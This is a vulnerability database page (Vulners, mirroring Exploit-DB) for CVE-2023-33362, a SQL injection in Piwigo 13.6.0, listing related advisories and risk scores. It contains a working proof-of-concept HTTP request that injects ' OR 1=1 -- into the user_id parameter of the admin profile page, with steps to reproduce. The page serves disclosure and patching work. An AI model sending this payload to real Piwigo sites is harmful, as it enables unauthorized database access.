Vulners
Lucene search
๐ Piwigo 13.6.0 SQL Injection
๐๏ธย 03 Dec 2025ย 00:00:00Reported byย CodeSecLabTypeย 
ย packetstorm๐ย packetstorm.news๐ย 112ย Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2023-33362 | 23 May 202318:26 | โ | circl |
 | Piwigo SQLๆณจๅ ฅๆผๆด | 23 May 202300:00 | โ | cnnvd |
 | CVE-2023-33362 | 23 May 202300:00 | โ | cve |
 | CVE-2023-33362 | 23 May 202300:00 | โ | cvelist |
 | Piwigo 13.6.0 - SQL Injection | 2 Dec 202500:00 | โ | exploitdb |
 | EUVD-2023-37525 | 3 Oct 202520:07 | โ | euvd |
 | CVE-2023-33362 | 23 May 202314:15 | โ | nvd |
 | Piwigo < 13.7.0 Multiple SQLi Vulnerabilities | 24 May 202300:00 | โ | openvas |
 | CVE-2023-33362 | 23 May 202314:15 | โ | osv |
 | Sql injection | 23 May 202314:15 | โ | prion |
10
# Exploit Title: Piwigo 13.6.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/Piwigo/Piwigo
# Software Link: https://github.com/Piwigo/Piwigo
# Version: 13.6.0
# Tested on: Windows
# CVE : CVE-2023-33362
Proof Of Concept:
GET /admin.php?page=profile&user_id=' OR 1=1 -- HTTP/1.1
Host: piwigo
Steps to Reproduce
Login as an admin user.
Send the request.
Observe the resultData
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Dec 2025 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.8
EPSS0.04829
SSVC